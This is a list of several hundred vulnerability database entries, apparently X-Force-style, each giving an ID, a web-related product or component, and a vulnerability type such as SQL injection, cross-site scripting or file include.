[41244] RSA Authentication Agent for Web IISWebAgentIF.dll cross-site scripting
[41213] WebChat module for eXV2 index.php SQL injection
[41175] IBM WebSphere MQ runmqsc security bypass
[41150] Adobe ColdFusion administrator interface brute force
[41136] Sun Java Web Start unspecified privilege escalation
[41135] Sun Java Web Start unspecified buffer overflow
[41133] Sun Java Web Start useEncodingDecl() buffer overflow
[41127] Linksys WRT54G FTP interface denial of service
[41117] D-Link DSL-G604T cgi-bin/webcm cross-site scripting
[41089] Neptune Web Server 404 error page cross-site scripting
[41069] Sun Java Web Console information disclosure
[41047] WebCT Don't wrap text message option cross-site scripting
[41029] Sun Java Web Start application privilege escalation
[41026] Sun Java Web Start javaws buffer overflow
[41021] Xitex WebContent M1 redirect.do cross-site scripting
[41010] Ruby WEBrick directory traversal
[40992] WebKit regular expression code execution
[40984] Mini Web Server (MiniWebsvr) HTTP GET directory traversal
[40936] IBM WebSphere MQ XA client insecure permission
[40930] IBM WebSphere MQ SVRCONN security bypass
[40905] D-Bus send_interface security bypass
[40862] Web_Links module for PHP-Nuke cid parameter SQL injection
[40847] Aeries Browser Interface GradebookStuScores.asp SQL injection
[40839] Porar Webboard question.asp SQL injection
[40838] Rising Online Virus Scanner Web Scan ActiveX control code execution
[40834] SurgeMail webmail.exe buffer overflow
[40833] SurgeMail and WebMail webmail.exe format string
[40814] Portail Web Php site_path file include
[40782] Citrix MetaFrame Web Manager login.asp cross-site scripting
[40757] Aeries Browser Interface (ABI) FC or Term SQL injection
[40756] Aeries Browser Interface (ABI) new event cross-site scripting
[40710] BEA WebLogic Portal Admin Tools page weak security
[40709] BEA WebLogic Portal entitlement security bypass
[40708] BEA WebLogic Workshop invalid action cross-site scripting
[40707] BEA WebLogic Server and WebLogic Express WSDL information disclosure
[40706] BEA WebLogic Portal unspecified Groupspace functions cross-site scripting
[40705] BEA WebLogic Portal config.xml information disclosure
[40704] BEA WebLogic Workshop unspecified cross-site scripting
[40703] BEA WebLogic Portal Administrative Console information disclosure
[40702] BEA WebLogic and WebLogic Express servlet unauthorized access
[40701] BEA WebLogic Portal entitlement unauthorized access
[40700] BEA WebLogic Server and WebLogic Express JMS messages security bypass
[40699] BEA WebLogic Server JMS distributed queue security bypass
[40697] BEA WebLogic Server and WebLogic Express login page session hijacking
[40696] BEA WebLogic Server and WebLogic Express administration console cross-site scripting
[40695] BEA WebLogic Server and WebLogic Express account lockout security bypass
[40694] BEA WebLogic Server and WebLogic Express HttpClusterServlet and HttpProxyServlet privilege escalation
[40692] BEA WebLogic Server and WebLogic Express proxy plugin denial of service
[40656] Now SMS/MMS Gateway Web authorization buffer overflow
[40651] WebGUI new users cross-site scripting
[40625] webcamXP pocketpc and show_gallery_pic denial of service
[40594] XPWeb Download.php directory traversal
[40576] artmedic weblog artmedic_print.php cross-site scripting
[40550] Website META Language wml_contrib/wmg.cgi and wml_backend/p3_eperl/eperl_sys.c symlink
[40549] Website META Language wml_backend/p1_ipp/ipp.src symlink
[40522] artmedic weblog artmedic_print.php file include
[40521] artmedic weblog index.php file include
[40509] Real Estate Web Site agentlist.asp SQL injection
[40484] Cisco Unified Communications Manager interface page SQL injection
[40478] Novell Web Manager webadmin-apache.conf security bypass
[40458] artmedic weblog artmedic_print.php and index.php cross-site scripting
[40416] Multiple IEA products Web server code execution
[40353] Mozilla Firefox Web forgery warning dialog security bypass
[40323] IBM WebSphere Edge Server caching proxy cross-site scripting
[40317] SAP NetWeaver Web Application Server enserver.exe denial of service
[40300] Webin webmin_search.cgi cross-site scripting
[40292] Portail Web Php multiple scripts file include
[40277] EMC Documentum Administrator and Webtop dmclTrace.jsp file overwrite
[40272] Soft3304 04WebServer OpenSSL data denial of service
[40271] Soft3304 04WebServer file names information disclosure
[40229] VHD Web Pack index.php file include
[40215] Novell GroupWise WebAccess webacc cross-site scripting
[40166] Web Wiz Rich Text Editor RTE_file_browser.asp and file_browser.asp directory traversal
[40164] Web Wiz Rich Text Editor RTE_popup_save_file.asp file upload
[40085] webSPELL admincenter.php cross-site request forgery
[40084] webSPELL index.php cross-site scripting
[40083] Winmail Webmail module unspecified
[40076] Getahead Direct Web Remoting (DWR) unspecified denial of service
[40062] Microsoft Windows WebDAV Mini-Redirector buffer overflow
[40031] WebCalendar search.php cross-site scripting
[40030] WebCalendar pref.php cross-site scripting
[40029] WebCalendar event description field cross-site scripting
[39994] Easy File Sharing Web Server Startup folder file upload
[39979] F5 BIG-IP Web Management ASM rep_request.php cross-site scripting
[39974] Web Editor ActiveSquare ActiveX Control code execution
[39952] eZ publish admin interface information disclosure
[39933] IBM WebSphere Application Server SimpleFileServlet information disclosure
[39906] IBM AIX WebSM insecure permissions
[39868] Web Wiz Rich Text Editor RTE_file_browser.asp directory traversal
[39863] Web Wiz NewsPad RTE_file_browser.asp directory traversal
[39857] IBM Websphere Application Server http_plugin.log file information disclosure
[39856] Web Wiz Forums RTE_file_browser.asp file_browser.asp directory traversal
[39830] IBM WebSphere Business Modeler repository weak security
[39818] IBM Websphere Application Server PropFilePasswordEncoder utility unspecified
[39817] Uebimiau Webmail state variables authentication bypass
[39814] IBM WebSphere Application Server monitor role users unspecified vulnerability
[39808] IBM WebSphere Application Server serveServletsByClassnameEnabled unspecified
[39796] 360 Web Manager CMS form.php SQL injection
[39765] Small Axe Weblog linkbar.php file include
[39734] Real Estate Web Site default.asp SQL injection
[39724] MailBee Webmail Pro download_view_attachment.aspx directory traversal
[39718] MiniWeb HTTP Server _mwProcessReadSocket() buffer overflow
[39713] MiniWeb HTTP Server mwGetLocalFileName() directory traversal
[39640] DVRHOST Web CMS OCX PdvrOcx Class ActiveX control buffer overflow
[39635] Apple Safari KHTML Webkit denial of service
[39595] Horde IMP Webmail Client and Horde Groupware Webmail Edition HTML filter security bypass
[39577] WebPortal CMS actions.php SQL injection
[39572] PHP Webquest backup_phpwebquest.php information disclosure
[39560] PHP Webquest soporte_horizontal_w.php SQL injection
[39556] Gateway WebLauncher CWebLaunchCtl multiple ActiveX controls command execution
[39554] Gateway WebLauncher CWebLaunchCtl ActiveX control buffer overflow
[39486] WebPortal CMS action.php weak security
[39463] SAM Broadcaster samPHPweb songinfo.php SQL injection
[39460] Uebimiau Web-Mail error.php directory traversal
[39451] Horde Web-Mail go.php directory traversal
[39414] WordPress XMLRPC metaWeblog.getRecentPosts function information disclosure
[39397] samPHPweb db.php file include
[39391] phpWebSite search module cross-site scripting
[39386] DivX Web Player npUpload.dll ActiveX control denial of service
[39343] AGENCY4NET WEBFTP download2.php directory traversal
[39336] WebPortal CMS index.php SQL injection
[39315] Gallery WebCam module unspecified vulnerability
[39216] Web Sihirbazi default.asp SQL injection
[39213] Wallpaper Complete Website category.php and editadgroup.php SQL injection
[39205] Sun Java System Web Proxy Server View Error Log cross-site scripting
[39204] Macrovision ActiveX control (isusweb.dll) buffer overflow
[39176] Aeries Browser Interface LostPwd.asp SQL injection
[39175] IBM Lotus Domino Web Access dwa7 ActiveX control buffer overflow
[39163] Opera Web browser bitmaps information disclosure
[39161] Opera Web browser TLS certificate code execution
[39147] Opera Web browser plugins security bypass
[39143] MOG-WebShop index.php SQL injection
[39142] Perforce P4Web Content-Length header denial of service
[39117] Google Web Toolkit benchmark reporting system cross-site scripting
[39116] iMesh IMWebControl ActiveX control buffer overflow
[39091] Apple Safari WebKit security bypass
[39086] Cherokee Web Server source code information disclosure
[39085] Cherokee Web Server directory traversal
[39076] FreeWebshop.org index.php information disclosure
[39074] FreeWebshop.org multiple parameters SQL injection
[39041] WebGUI create admin security bypass
[39023] Websense Enterprise User-Agent security bypass
[39005] BEA WebLogic Mobility Server Image Converter information disclosure
[38981] RoundCube Webmail email messages cross-site scripting
[38976] Mcms Easy Web Make index.php file include
[38974] BarracudaDrive Web Server Group Chat feature denial of service
[38973] BarracudaDrive Web Server delete directory traversal
[38972] BarracudaDrive Web Server source code disclosure
[38971] BarracudaDrive Web Server HTTP requests directory traversal
[38957] webSPELL calendar.php cross-site scripting
[38955] webSPELL usergallery.php cross-site scripting
[38936] Websense Enterprise and Websense Web Security Suite logon page cross-site scripting
[38934] Easy File Sharing Web Server username registration requests information disclosure
[38933] Easy File Sharing Web Server .sdb information disclosure
[38932] Easy File Sharing Web Server file upload directory traversal
[38927] WebDoc categories.asp and subcategory.asp SQL injection
[38907] SerWEB get_js.php file include
[38906] SerWEB multiple scripts file include
[38891] IBM Lotus Sametime WebRunMenuFrame page cross-site scripting
[38863] Opera Web browser BMP file denial of service
[38837] Squid Web Proxy Cache cache update replies denial of service
[38772] Web-MeetMe play.php directory traversal
[38754] IBM WebSphere MQ unspecified memory corruption
[38737] Apple Mac OS X WebCore component page transition race condition information disclosure
[38628] Proverbs Web Calendar caladmin.php SQL injection
[38612] WorkingOnWeb events.php SQL injection
[38600] FileMaker Pro and Server Web publishing cross-site scripting
[38585] IBM Lotus Domino Web Server task cross-site scripting
[38565] Multiple vendor Web browser SSL subjectAltName:dNSName attribute weak security
[38554] Webdev HotScripts Clone software-description.php SQL injection
[38504] AIDA Web information disclosure
[38488] IBM Websphere Application Server Expect: header cross-site scripting
[38487] Apple Mac OS X WebKit component PDF file information disclosure
[38486] Apple Mac OS X WebKit component Safari TCP port security bypass
[38485] Apple Mac OS X WebKit component private key security bypass
[38483] Apple Mac OS X WebCore component browser history code execution
[38482] Apple Mac OS X WebCore component HTML form field manipulation
[38481] Apple Mac OS X WebCore component file:// URL unauthorized file access
[38445] WebEx GPCContainer ActiveX Control denial of service
[38444] VTLS Web Gateway vtls.web.gateway.cgi cross-site scripting
[38430] Microsoft Office Web Component OWC11.DataSourceControl ActiveX denial of service
[38395] CA SiteMinder Web Agent smpwservices.fcc cross-site scripting
[38340] Rails URL-based Web session hijacking
[38295] MyWebFTP pass.php file information disclosure
[38221] SonicWALL WebCacheCleaner ActiveX control file delete
[38210] Macrovision ActiveX control (isusweb.dll) code execution
[38181] Webroot Desktop Firewall security bypass
[38179] IBM WebSphere Application Server navigateTree.do page cross-site request forgery
[38177] IBM WebSphere Application Server navigateTree.do page cross-site scripting
[38159] GOM Player GomWebCtrl.GomManager.1 ActiveX control buffer overflow
[38128] WebLibs weblibs.pl TextFile parameter shell command execution
[38114] 3Com OfficeConnect 3CRWER100-75 Web server information disclosure
[38111] 3Com OfficeConnect 3CRWER100-75 router virtual server unauthorized Web management access
[37390] Aleris Software Systems Web Publisher Calendar page.asp SQL injection
[37381] The Online Web Library Site scripture.php file include
[37380] LiteSpeed Web Server mime-type information disclosure
[37367] WebIf cmd parameter cross-site scripting
[37329] Oracle Database, Application Server, and Enterprise Manager Help for Web unspecified
[37327] Oracle E-Business Suite Self-Service Web Applications component unspecified
[37295] Alcatel Omnivista 4760 Webclient.php cross-site scripting
[37286] Mozilla Firefox and SeaMonkey XUL Web page spoofing
[37278] Weblinks module for Drupal unspecified cross-site scripting
[37248] Multiple Cisco Unified Contact Center and Intelligent Contact Management products Web View unauthorized access
[37243] Apache Tomcat WebDAV directory traversal
[37220] WebMod auth.w cross-site scripting
[37203] IBM WebSphere Application Server Administrative Scripting Tools unspecified vulnerability
[37147] RHSA update for Mozilla Firefox and SeaMonkey user interface spoofing not installed
[37146] RHSA update for Multiple Web browser default charset cross-site scripting not installed
[37060] WebDesktop apps.php and wsk.php file include
[37040] Sun Java Runtime Environment Web proxy security bypass
[37031] DNews dnewsweb.exe cross-site scripting
[37030] xKiosk WEB xkurl.php file include
[37025] TYPOlight webCMS preview.php information disclosure
[36979] MailBee WebMail Pro login.php and default.php cross-site scripting
[36960] Solidweb Novus buscar.asp cross-site scripting
[36954] Cart32 c32web.exe information disclosure
[36950] Sun Java Web Start drag and drop weak security
[36948] Web Template Management System index.php SQL injection
[36946] Sun Java Web Start cache information disclosure
[36945] Sun Java Web Start multiple unspecified untrusted application file access
[36944] Sun Java Web Start unspecified information disclosure
[36935] Alt-N WebAdmin useredit_account.wdm unauthorized access
[36865] WebStore WSSecurity.pl script authentication bypass
[36808] Webmedia Explorer multiple file include
[36798] WebBatch dumpinputdata information disclosure
[36794] Sun Solaris Human Interface Device (HID) denial of service
[36790] Xunlei Web Thunder ActiveX control buffer overflow
[36759] Webmin unspecified URL command execution
[36716] Barracuda Spam Firewall Web Administration Console cross-site scripting
[36706] PhpWebGallery picture.php cross-site scripting
[36704] WebBatch client cross-site scripting
[36696] Level One WBR3404TX Broadband Router Web Management cross-site scripting
[36644] TinyWebGallery multiple scripts cross-site scripting
[36605] PHP Webquest soporte_derecha_w.php SQL injection
[36570] web-app.org WebAPP filename file upload
[36569] web-app.org WebAPP QUERY_STRING multiple cross-site scripting
[36525] IBM WebSphere Application Server Edge Component unspecified
[36493] Webace Linkscript start.php SQL injection
[36466] Novell GroupWise WebAccess User.Id cross-site scripting
[36427] WebOddity directory traversal
[36409] Weblogicnet files_dir parameter file include
[36365] Stampit Web SOAP request denial of service
[36322] BEA Weblogic Server default cipher information disclosure
[36321] BEA Weblogic Server and WebLogic Express headers denial of service
[36320] BEA Weblogic Server null cipher information disclosure
[36319] BEA Weblogic Server and WebLogic Express unspecified denial of service
[36300] InterWorx-CP Webmaster Level (SiteWorx) multiple scripts file include
[36264] escafeWeb (Tuigwaa) unspecified cross-site scripting
[36213] Open WebMail openwebmail-read.pl cross-site scripting
[36182] AWBS (Advanced Webhost Billing System) unspecified information disclosure
[36180] Ripe Website Manager multiple scripts SQL injection
[36179] Ripe Website Manager multiple script cross-site scripting
[36167] WebEvent webevent.cgi cross-site scripting
[36115] Yahoo! Messenger webcam streams buffer overflow
[36029] Cisco VPN Client for Windows Dial-up Networking Interface privilege escalation
[35990] Prozilla Webring category.php SQL injection
[35946] WebCart unspecified cross-site scripting
[35941] ZyXEL ZyWALL and ZyNOS management interface denial of service
[35940] web-app.org WebAPP and web-app.net WebAPP Network Edition moveim function unspecified
[35939] web-app.org WebAPP and web-app.net WebAPP Network Edition From field unspecified
[35938] web-app.org WebAPP and web-app.net WebAPP Network Edition getcgi function unspecified
[35937] web-app.org WebAPP and web-app.net WebAPP Network Edition memberlist.dat unspecified
[35936] web-app.org WebAPP Random Cookie Password unspecified
[35935] web-app.org WebAPP and web-app.net WebAPP Network Edition editprofile3 function unspecified
[35931] web-app.org WebAPP displaypost function weak security
[35930] web-app.org WebAPP multiple cross-site scripting
[35929] web-app.org WebAPP and web-app.net WebAPP Network Edition administration cross-site request forgery
[35925] Web News multiple scripts file include
[35914] ZyXEL ZyWALL and ZyNOS management interface default passwords
[35913] ZyXEL ZyWALL and ZyNOS management interface cross-site request forgery
[35894] Webmatic multiple unspecified
[35871] Cisco Unified MeetingPlace Web Conferencing STPL and FTPL cross-site scripting
[35783] Sun Java System Web Server redirect feature HTTP response splitting
[35754] Open WebMail multiple scripts cross-site scripting
[35747] WebDirector index.php cross-site scripting
[35740] Apple Mac OS X WebCore information disclosure
[35736] WikiWebWeaver index.php file upload
[35728] Apple Mac OS X Java interface code execution
[35697] ADempiere Bazaar WebUI unauthorized access
[35690] phpWebFileManager index.php file include
[35671] WebEvents: Online Event Registration Template sign_in.aspx SQL injection
[35669] WebStore - Online Store Application Template sign_in.aspx SQL injection
[35667] Real Estate listing website application template logging SQL injection
[35603] Webyapar multiple scripts SQL injection
[35595] Webbler Mail a Friend mail relay
[35593] Webbler comment information disclosure
[35581] Webbler uploader/index.php cross-site scripting
[35570] IBM WebSphere Application Server unspecified
[35546] Areca Command Line Interface (CLI) cli32 file buffer overflow
[35544] webSPELL index.php file include
[35441] MailMarshal SMTP Spam Quarantine HTTP interface password reset information disclosure
[35433] WebCit multiple cross-site scripting
[35432] WebCit unspecified cross-site request forgery
[35400] activeWeb contentserver CMS editor insecure permissions
[35399] activeWeb contentserver CMS worklist_edit.asp cross-site scripting
[35392] activeWeb contentserver mimetype cross-site scripting
[35390] activeWeb contentserver CMS picture_real_edit.asp SQL injection
[35389] activeWeb contentserver CMS msg parameter cross-site scripting
[35335] Sun Java System Application Server and Sun Java System Web Server XSLT stylesheets code execution
[35331] Webmin admin information disclosure
[35320] Sun Java Web Start JNLP buffer overflow
[35303] Xeweb XEForum cookie security bypass
[35296] Webmatic admin_album.php and admin_downloads.php SQL injection
[35278] SAP Web Application Server ICMAN.exe denial of service
[35266] Oracle Rapid Install Web Server login page cross-site scripting
[35236] Campsite Admin Interface unspecified
[35213] Microsoft Office Web Components DataSourceControl object code execution
[35212] Microsoft Office Web Components Spreadsheet object code execution
[35200] Ripe Website Manager phpinfo.php information disclosure
[35188] Ripe Website Manager level parameter file include
[35170] SAP Netweaver Web Dynpro Java (BC-WD-JAV) cross-site scripting
[35169] Sun Java Web Start java.policy file code execution
[35161] WebChat login.php SQL injection
[35150] Baby Web Server unspecified file upload
[35140] Xunlei Web Thunder ThunderServer.WebThunder.1 ActiveX control file download
[35125] Linksys WAG54GS Wireless-G ADSL Gateway with SpeedBooster router HTTP interface cross-site request forgery
[35091] EVA-Web index.php3 file include
[35044] LiteWeb GET request denial of service
[35042] KF Web Server index.wkf cross-site scripting
[35033] IBM Websphere Application Server Web container information disclosure
[35003] eSellerate SDK ActiveX control GetWebStoreURL buffer overflow
[34973] SerWEB _SERWEB[serwebdir] parameter file include
[34921] WebIf outconfig file include
[34915] Web Wiz rich text editor cross-site scripting
[34905] IBM Websphere Application Server Samples component cross-site scripting
[34904] IBM Websphere Application Server PD tools component unspecified
[34903] IBM Websphere Application Server Default Messaging Component denial of service
[34901] IBM Websphere Application Server Default Messaging Component security bypass
[34869] Apache Tomcat JSP example Web application cross-site scripting
[34854] Mbedthis AppWeb HTTP TRACE cross-site scripting
[34845] web-app.org WebAPP and web-app.net WebAPP Network Edition menu manager command execution
[34842] AppWeb MprLogToFile::logEvent function denial of service
[34817] Buttercup web file manager (BWFM) index.php cross-site scripting
[34810] Webmin pam_login.cgi cross-site scripting
[34774] MiniWeb HTTP Server Content-Length denial of service
[34766] W1L3D4 WEBmarket urunbak.asp SQL injection
[34759] Yahoo! Messenger Webcam Viewer ActiveX control buffer overflow
[34758] Yahoo! Messenger Webcam Upload ActiveX control buffer overflow
[34726] WebSVN filedetails.php cross-site scripting
[34721] Macrovision FLEXnet boisweb.dll ActiveX control buffer overflow
[34720] Microsoft FrontPage Personal Web Server CERN Image Map Dispatcher buffer overflow
[34707] BDigital WebStudio CMS pageid parameter cross-site scripting
[34683] Comdev Web Blogger sampleblogger.php file include
[34667] Madirish Webmail basedir file include
[34631] IBM AIX sysmgt.websm.rte denial of service
[34589] British Telecommunications Business and Consumer webhelper ActiveX control buffer overflow
[34559] Zindizayn Okul Web Sistemi mezungiris.asp SQL injection
[34558] WabCMS webcmsn.mdb database information disclosure
[34524] Sun Java System Web Proxy Server SOCKS module buffer overflow
[34519] WebAvis class.php file include
[34518] Techno Dreams Web Directory / Search Engine database information disclosure
[34510] GForge cvsweb.php command execution
[34492] Web Icerik Yonetim Sistemi index.php cross-site scripting
[34392] GNATS gnatsweb.pl cross-site scripting
[34365] BEA Weblogic Server and WebLogic Express unspecified cross-site scripting
[34326] OpenEdge WebSpeed Workshop multiple scripts denial of service
[34321] WebGUI DataForm.pm security bypass
[34296] Caucho Resin WEB-INF directory traversal
[34295] Webdesproxy webdesproxy.c buffer overflow
[34291] BEA Weblogic Server and WebLogic Express LDAP brute force
[34290] BEA WebLogic Enterprise and Tuxedo information disclosure
[34289] BEA WebLogic Server and WebLogic Express Administration Console insecure permissions
[34288] BEA Weblogic Server and WebLogic Express configToScript information disclosure
[34287] BEA WebLogic Server JMS Message Bridge security bypass
[34286] BEA WebLogic Server and WebLogic Express configuration information disclosure
[34285] BEA WebLogic Portal entitlement weak security
[34284] BEA WebLogic Server JMS security bypass
[34283] BEA WebLogic Portal GroupSpace cross-site scripting
[34282] BEA WebLogic Server and WebLogic Express HttpProxyServlet and HttpClusterServlet unauthorized access
[34281] BEA WebLogic Workshop and WebLogic Integration Test View Console directory traversal
[34278] BEA WebLogic Server and WebLogic Express SSL port denial of service
[34266] CommuniGate Pro Web mail cross-site scripting
[34117] Progress Webspeed Messenger WService information disclosure
[34105] Mini Web Shop sendmail.php and order_form.php cross-site scripting
[34057] Progress Webspeed _edit.r denial of service
[33991] Progress Webspeed Messenger webutil/_cpyfile.p information disclosure
[33984] Sun Java Web Start system classes privilege escalation
[33967] Pi3Web HTTP Server HTTP request denial of service
[33949] IBM Websphere Application Server Security component unspecified
[33903] NaviCOPA Web Server HTTP GET requests denial of service
[33886] Asterisk Management Interface denial of service
[33884] B2 Weblog and News Publishing Tool b2inc parameter file include
[33860] AWBS (Advanced Webhost Billing System) cart2.php file include
[33840] ACVSWebServices for PHP5 Transport.php file include
[33818] Ripe Website Manager index.php SQL injection
[33817] Ripe Website Manager index.php cross-site scripting
[33804] uPHP ring website php script ring parameter SQL injection
[33803] Apple Mac OS X WebFoundation information disclosure
[33801] Apple Mac OS X WebDAV filesystem privilege escalation
[33793] WEBinsta FM Manager login.php file include
[33783] EBA-News webpages.php file include
[33763] web-app.org WebAPP and web-app.net WebAPP Network Edition search.pl information disclosure
[33762] web-app.org WebAPP and web-app.net WebAPP Network Edition search.pl cross-site scripting
[33754] web-app.org WebAPP and web-app.net WebAPP Network Edition cgi-lib/subs.pl information disclosure
[33744] Novell Groupwise WebAccess GWINTER.exe buffer overflow
[33735] web-app.org WebAPP viewnews cross-site scripting
[33734] rdiffWeb rdw_helpers.py directory traversal
[33731] Sun Java Web Console libc syslog format string
[33722] PHP-Nuke Web_Links, News, and Download module SQL injection
[33718] my little weblog id parameter cross-site scripting
[33711] Daniel Naber LanguageTool Web server error message cross-site scripting
[33709] IBM Lotus Domino Web Access (DWA) Active Content Filter Content-Type header cross-site scripting
[33708] Maian Weblog path_to_folder file include
[33689] Web Slider path parameter file include
[33645] MailBee WebMail Pro check_login.asp cross-site scripting
[33644] IBM WebSphere Application Server Java Message Service denial of service
[33641] PHPWebNews m_txt cross-site scripting
[33629] Microsoft Windows DNS Server RPC interface buffer overflow
[33613] webMethods Glue Management Console resource directory traversal
[33598] WebKalk2 engine.inc.php file include
[33591] @Mail WebMail System atmail.php cross-site scripting
[33586] Database Administration (dba) module for Drupal administrative and user interfaces cross-site scripting
[33577] Mini Web Server (MiniWebsvr) unspecified directory traversal
[33529] Portail Web PHP pageAll parameter file include
[33517] Mozilla Firefox document.location interface spoofing
[33499] webblizzard CMS PHPSESSID session hijacking
[33498] webblizzard CMS index_cms.php cross-site scripting
[33475] webSPELL picture.php directory traversal
[33472] Symantec Enterprise Security Manager (ESM) upgrade interface code execution
[33471] IBM WebSphere Application Server Servlet Engine information disclosure
[33388] Advanced Website Creator (AWC) mysql_escape_string SQL injection
[33351] Company WebSite Builder Pro INCLUDE_PATH file include
[33296] NaviCOPA Web Server cgi buffer overflow
[33291] Data Domain administration interface command execution
[33281] Web Content System formjavascript.php file include
[33280] IBM Lotus Domino Web Access Active Content Filter cross-site scripting
[33244] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) information disclosure
[33228] Horde Groupware Webmail Edition search.php and rule.php cross-site scripting
[33222] Bernard JOLY BJ Webring formulaire.php cross-site scripting
[33195] eWebquiz ewebquiz.asp SQL injection
[33162] ClassWeb language.php and survey.php file include
[33157] aspWebCalendar calendar.asp SQL injection
[33123] IBM WebSphere Application Server unspecified HTTP response splitting
[33096] TYPOlight webCMS unspecified
[33095] Web Wiz Forums pop_up_member_search.asp SQL injection
[33058] Webmin and Usermin simplify_path function directory traversal
[33035] Company WebSite Builder comanda.php file include
[33034] ViperWeb Portal System index.php file include
[33025] IBM WebSphere Application Server JSP WAR and Extended Document Root source disclosure
[33022] Web-APP.org WebAPP cookie security bypass
[33016] Sun Java System Web Server URL information disclosure
[33008] WebCalendar multiple scripts file include
[33002] Sun Java System Web Server revoked certificate security bypass
[32998] Sascha Schroeder WebLog index.php directory traversal
[32973] Apple Mac OS X HID interface privilege escalation
[32972] WebCreator load.inc.php file include
[32877] WEBO foldertree.php file include
[32870] web-app.org WebAPP and web-app.net WebAPP Network Edition admin feature cross-site scripting
[32865] web-app.org WebAPP and web-app.net WebAPP Network Edition Search form unspecified
[32864] web-app.org WebAPP Forum Archive feature and recent searches information disclosure
[32863] web-app.org WebAPP censor unspecified
[32862] web-app.org WebAPP hidden inputs unspecified
[32861] Novell NetMail webadmin.exe buffer overflow
[32859] web-app.org WebAPP CAPTCHA setting weak security
[32856] web-app.org WebAPP and web-app.net WebAPP Network Edition Real Name unspecified
[32855] web-app.org WebAPP and web-app.net WebAPP Network Edition guest profile unspecified
[32854] web-app.org WebAPP Edit Profile forms unspecified
[32853] web-app.org WebAPP cross-site request forgery unspecified
[32851] web-app.org WebAPP and web-app.net WebAPP Network Edition email addresses unspecified
[32850] web-app.org WebAPP and web-app.net WebAPP Network Edition Calendar Administration unspecified
[32847] web-app.org WebAPP and web-app.net WebAPP Network Edition multiple vectors cross-site scripting
[32840] EmbeddedWB Web Browser ActiveX control unspecified code execution
[32832] WebCalendar noSet variable overwrite
[32806] webSPELL members.php SQL injection
[32805] webSPELL files.php file upload
[32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
[32790] webSPELL multiple SQL injection
[32770] aWebNews path_to_news parameter file include
[32759] DivX Web Player DivXBrowserPlugin ActiveX control denial of service
[32755] WebMod Content-Length buffer overflow
[32726] Nullsoft SHOUTcast administrative interface cross-site scripting
[32725] Webmin and Usermin chooser.cgi cross-site scripting
[32723] Mozilla Firefox and SeaMonkey user interface spoofing
[32722] Multiple Web browser default charset cross-site scripting
[32687] PhpWebGallery register.php and search.php cross-site scripting
[32684] web-app.org WebAPP and web-app.net WebAPP Network Edition QUERY_STRING file overwrite
[32679] WebMplayer index.php command execution
[32678] Macrovision FLEXnet Connect Update Service Web Agent ActiveX control download method buffer overflow
[32676] WebMplayer index.php and filecheck.php SQL injection
[32670] webSPELL add squad feature file upload
[32669] webSPELL login SQL injection
[32646] J-Web Pics Navigator dir parameter directory traversal
[32645] Macrovision InstallFromTheWeb ActiveX buffer overflow
[32641] PHP Web application file include
[32599] webSPELL printview.php SQL injection
[32596] JBoss Application Server admin interface unauthorized access
[32595] IBM Lotus Domino Webmail names.nsf information disclosure
[32563] ezBOO WebStats update.php unauthorized access
[32554] webSPELL showonly parameter SQL injection
[32549] Trend Micro OfficeScan Web deployment SetupINICtrl ActiveX control buffer overflow
[32545] MiniWebsvr prn.htm file denial of service
[32526] web-app.org WebAPP and web-app.net WebAPP Network Edition Gallery Comments and Feedback cross-site scripting
[32506] web-app.org WebAPP and web-app.net WebAPP Network Edition Profile Edit feature cross-site scripting
[32499] web-app.org WebAPP and web-app.net WebAPP Network Edition Search Results pages cross-site scripting
[32498] web-app.org WebAPP and web-app.net WebAPP Network Edition Statistics Log viewer cross-site scripting
[32492] WebTester POST parameters cross-site scripting
[32490] WebTester directions.php SQL injection
[32483] @Mail WebMail System search.pl cross-site scripting
[32467] Plain Old Webserver (POW) HTTP request directory traversal
[32459] Aruba Mobility Controller management interface buffer overflow
[32451] Mini Web Server (MiniWebsvr) directory traversal
[32400] cPanel and WebHost Manager (WHM) Module scripts2/objcache cross-site scripting
[32318] Webmatic index_album.php file include
[32316] IBM WebSphere Application Server UserNameToken cache unspecified
[32295] IBM WebSphere Application Server unspecified JSP source disclosure
[32146] HTTP WebDAV PROPFIND component enabled
[32121] Portail Web Php includes.php file include
[32115] Portail Web Php index.php file include
[32098] SpoonLabs Vivvo Article Management CMS show_webfeed.php SQL injection
[32093] Web server directories readable
[32091] Web server script directory readable
[32072] WebBuilder StageLoader.php file include
[32045] Firewall trusted interface
[32039] Web server SSL version detected
[32036] Web server version detected
[32005] Cadre PHP Web Framework class.Quick_Config_Browser.php file include
[31960] Hitachi Web Server (HWS) and multiple uCosminexus and Cosminexus Expect header cross-site scripting
[31959] Hitachi Web Server (HWS) and multiple uCosminexus and Cosminexus image map cross-site scripting
[31946] Hitachi Web Server (HWS) and multiple uCosminexus and Cosminexus SSL weak security
[31905] WebGUI www_purgeList() security bypass
[31881] Webfwlog debug.php file include
[31868] OpenEMR interface/globals.php variable overwrite
[31826] CGI Rescue WebFORM unspecified cross-site scripting
[31752] Symantec Web Security (SWS) license registering denial of service
[31750] Symantec Web Security (SWS) HTML tags cross-site scripting
[31732] FreeWebshop.org login.php file include
[31695] Weblinks component for Joomla! category.php SQL injection
[31692] Website Baker class.login.php SQL injection
[31686] Web server URL encoding
[31685] IntraWeb Component of AToZed Software denial of service
[31678] Apple Mac OS X Webkit Webcore denial of service
[31664] Mini Web Server (MiniWebsvr) multiple buffer overflows
[31662] PHP Link Directory admin interface cross-site scripting
[31653] FreeWebshop.org index.php path disclosure
[31644] Microsoft IIS Web server access.cnf file detected
[31642] Microsoft IIS Web server service.cnf file detected
[31638] Microsoft IIS Web server svcacl.cnf file detected
[31632] webSPELL gallery.php SQL injection
[31631] Neon Labs Website lib/nl/nl.php file include
[31624] WebChat defines.php file include
[31603] BEA WebLogic Server and WebLogic Express proxy plug-in for Netscape Enterprise Server denial of service
[31602] BEA WebLogic Portal cluster weak security
[31596] BEA WebLogic Server, WebLogic Express, WebLogic Platform, and BEA JRockit return address buffer overflow
[31590] BEA WebLogic Portal entitlement weak security
[31588] BEA WebLogic Server and WebLogic Express on Solaris 9 socket denial of service
[31587] BEA WebLogic Server admin server weak security
[31586] BEA WebLogic Server and WebLogic Express malformed header denial of service
[31585] BEA WebLogic Server and WebLogic Express HTTP request information disclosure
[31579] BEA WebLogic Server and WebLogic Express EJB security bypass
[31578] BEA WebLogic Server and WebLogic Express EJB privilege escalation
[31577] BEA WebLogic Server and WebLogic Express WSEE runtime security bypass
[31576] BEA WebLogic Server and WebLogic Express jar update privilege escalation
[31574] BEA WebLogic Server and WebLogic Express web.xml denial of service
